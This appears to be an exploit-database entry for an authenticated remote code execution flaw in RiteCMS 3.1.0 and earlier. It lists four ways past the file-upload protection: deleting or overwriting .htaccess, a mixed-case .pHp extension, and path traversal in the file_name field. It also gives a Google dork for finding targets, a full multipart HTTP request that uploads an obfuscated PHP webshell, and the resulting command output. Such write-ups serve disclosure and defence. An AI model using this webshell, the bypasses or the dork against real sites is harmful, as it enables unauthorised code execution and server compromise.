[webapps] RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)

# Exploit Title: RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated) # Date: 25/07/2021 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://ritecms.com/ # Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip # Version: <= 3.1.0 # Tested on: Windows 10, Ubuntu 18, XAMPP # Google Dork: intext:"Powered by RiteCMS" # Reference: https://gist.github.com/faisalfs10x/bd12e9abefb0d44f020bf297a14a4597 """ ################ # Description # ################ # RiteCMS version 3.1.0 and below suffers from a remote code execution in admin panel. An authenticated attacker can upload a php file and bypass the .htacess configuration that deny execution of .php files in media and files directory by default. # There are 4 ways of bypassing the current file upload protection to achieve remote code execution. # Method 1: Delete the .htaccess file in the media and files directory through the files manager module and then upload the php file - RCE achieved # Method 2: Rename .php file extension to .pHp or any except ".php", eg shell.pHp and upload the shell.pHp file - RCE achieved # Method 3: Chain with Arbitrary File Overwrite vulnerability by uploading .php file to web root because .php execution is allow in web root - RCE achieved By default, attacker can only upload image in media and files directory only - Arbitrary File Overwrite vulnerability. Intercept the request, modify file_name param and place this payload "../webrootExec.php" to upload the php file to web root body= Content-Disposition: form-data; name="file_name" body= ../webrootExec.php So, webshell can be accessed in web root via http://localhost/ritecms.v3.1.0/webrootExec.php # Method 4: Upload new .htaccess to overwrite the old one with content like below for allowing access to one specific php file named "webshell.php" then upload PHP webshell.php - RCE achieved $ cat .htaccess <Files *.php> deny from all </Files> <Files ~ "webshell\.php$"> Allow from all </Files> ################################### # PoC for webshell using Method 2 # ################################### Steps to Reproduce: 1. Login as admin 2. Go to Files Manager 3. Choose a directory to upload .php file either media or files directory. 4. Then, click Upload file > Browse.. 3. Upload .php file with extension of pHp, eg webshell.pHp - to bypass .htaccess 4. The webshell.pHp is available at http://localhost/ritecms.v3.1.0/media/webshell.pHp - if you choose media directory else switch to files directory Request: ======== POST /ritecms.v3.1.0/admin.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------410923806710384479662671954309 Content-Length: 1744 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager&action=upload&directory=media Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Sec-GPC: 1 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="mode" filemanager -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="file"; filename="webshell.pHp" Content-Type: application/octet-stream <?php system($_GET[base64_decode('Y21k')]);?> -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="directory" media -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="file_name" -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="upload_mode" 1 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="resize_xy" x -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="resize" 640 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="compression" 80 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail_resize_xy" x -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail_resize" 150 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="thumbnail_compression" 70 -----------------------------410923806710384479662671954309 Content-Disposition: form-data; name="upload_file_submit" OK - Upload file -----------------------------410923806710384479662671954309-- #################### # Webshell access: # #################### # Webshell access via: PoC: http://localhost/ritecms.v3.1.0/media/webshell.pHp?cmd=id # Output: uid=33(www-data) gid=33(www-data) groups=33(www-data) """